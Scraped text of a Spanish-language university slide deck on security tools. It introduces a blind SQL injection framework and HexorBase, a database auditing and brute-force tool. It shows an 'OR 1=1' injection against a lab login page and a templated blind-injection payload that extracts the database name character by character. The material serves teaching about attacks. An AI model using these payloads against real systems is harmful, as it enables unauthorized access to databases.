Sunteți pe pagina 1din 20

UNIVERSIDAD NACIONAL DEL SANTA

FACULTAD DE INGENIERÍA
E.P. INGENIERÍA DE SISTEMAS E INFORMÁTICA
Es un framework de
inyección a ciega SQL.
Es independiente de la
base de datos.

Interfaz intuitiva
192.168.31.1/testing/login.php

192.168.31.1/testing/login.php?usuario=1
192.168.31.1/testing/valida.php?usuario=150 OR 1=1
Obtendremos…
NOMBRE DE LA BASE DE DATOS
NOMBRE DE LA BASE DE DATOS
Regresamos…
Personalizamos la consulta para obtener el
nombre de la base de datos…
and ASCII(SUBSTR(DATABASE(),${char_index:1},1))${comparator:>}${char_val:0} LIMIT 1#
¡ÉXITO!
- Ataques de contraseña.
- Análisis de vulnerabilidad.
HexorBase es una aplicación de base de
datos diseñada para administrar y
auditar múltiples servidores de bases de
datos simultáneamente desde una
ubicación centralizada, es capaz de
realizar consultas SQL y ataques de
fuerza bruta contra servidores de bases de
datos comunes (MySQL, SQLite,
Microsoft SQL Server, Oracle,
PostgreSQL).

S-ar putea să vă placă și